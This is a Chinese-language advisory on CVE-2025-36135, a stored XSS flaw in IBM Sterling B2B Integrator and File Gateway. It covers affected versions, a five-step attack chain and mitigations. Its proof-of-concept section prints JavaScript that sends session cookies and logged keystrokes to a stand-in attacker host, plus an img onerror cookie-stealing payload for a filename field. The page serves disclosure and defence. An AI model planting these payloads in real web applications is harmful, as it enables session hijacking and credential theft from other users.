CVE-2025-36135 IBM Sterling B2B Integrator 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-36135

漏洞类型

XSS (跨站脚本攻击)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

IBM Sterling B2B Integrator, IBM Sterling File Gateway

漏洞概述

CVE-2025-36135是IBM Sterling B2B Integrator和IBM Sterling File Gateway产品中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞影响版本6.0.0.0至6.1.2.7_1、6.2.0.0至6.2.0.5以及6.2.1.0。漏洞允许已认证用户在Web UI中嵌入任意JavaScript代码，从而改变预期的应用程序功能。攻击者可以利用此漏洞在受害者浏览Web界面时执行恶意脚本，进而窃取会话Cookie、劫持用户会话或窃取敏感凭据信息。由于该漏洞需要低权限的已认证用户即可发起攻击，且攻击代码会被永久存储在服务器端，因此对系统安全构成较大威胁。攻击者通过在信任会话中注入恶意代码，可能导致凭证泄露或进一步横向移动。

技术细节

该漏洞为存储型XSS（Stored XSS），也称为持久性跨站脚本攻击。攻击原理如下：1）攻击者以低权限用户身份登录IBM Sterling B2B Integrator或Sterling File Gateway系统；2）攻击者在Web界面的输入字段（如文件名、描述字段、配置参数等）中注入恶意JavaScript代码；3）由于系统未对用户输入进行充分的输出编码或过滤，恶意脚本被永久存储在数据库中；4）当其他用户（如管理员）访问包含该恶意脚本的页面时，浏览器会执行注入的JavaScript代码；5）攻击者可借此窃取用户的会话Cookie、凭据或其他敏感信息。漏洞存在于Web UI的多个功能模块中，攻击者利用CVSS向量AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N可知，攻击复杂度低，无需特殊权限即可实施攻击。

攻击链分析

STEP 1

步骤1

攻击者获取IBM Sterling B2B Integrator或Sterling File Gateway的有效低权限账户

STEP 2

步骤2

攻击者登录系统后在Web UI的输入字段（如文件描述、配置参数）中注入恶意JavaScript代码

STEP 3

步骤3

恶意脚本被存储在服务器数据库中，当其他用户访问相关页面时触发执行

STEP 4

步骤4

攻击者通过XSS漏洞窃取受害者Cookie、会话令牌或诱导用户输入凭据

STEP 5

步骤5

攻击者利用窃取的凭证进行会话劫持、横向移动或进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-36135 PoC - Stored XSS in IBM Sterling B2B Integrator -->
<!-- This PoC demonstrates the XSS vulnerability in the Web UI -->
<!-- Replace TARGET_URL with the actual IBM Sterling application URL -->

<script>
// Steal session cookies
var cookies = document.cookie;
var xhr = new XMLHttpRequest();
xhr.open('POST', 'https://attacker-controlled-server.com/steal', true);
xhr.send('cookies=' + encodeURIComponent(cookies));

// Alternatively, perform keylogging
document.addEventListener('keypress', function(e) {
    var key = e.key;
    fetch('https://attacker-controlled-server.com/log?key=' + key);
});
</script>

<!-- Example attack payload for filename field -->
<!-- <img src=x onerror='fetch("https://attacker.com/cookie?c="+document.cookie)'> -->

影响范围

IBM Sterling B2B Integrator 6.0.0.0 - 6.1.2.7_1

IBM Sterling B2B Integrator 6.2.0.0 - 6.2.0.5

IBM Sterling B2B Integrator 6.2.1.0

IBM Sterling File Gateway 6.0.0.0 - 6.1.2.7_1

IBM Sterling File Gateway 6.2.0.0 - 6.2.0.5

IBM Sterling File Gateway 6.2.1.0

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1）限制Web UI访问权限，仅允许受信任的IP地址访问；2）启用HttpOnly和Secure标志保护Cookie；3）对Web界面的输入字段实施严格的输入验证和输出编码；4）启用详细的审计日志监控可疑活动；5）定期轮换用户会话令牌；6）考虑暂时禁用非必要的Web UI功能；7）部署WAF规则拦截潜在的XSS攻击payload。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36135
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36135
3 Details https://www.cvedetails.com/cve/CVE-2025-36135/
4 VulDB https://vuldb.com/cve/CVE-2025-36135
5 Link https://www.ibm.com/support/pages/node/7250509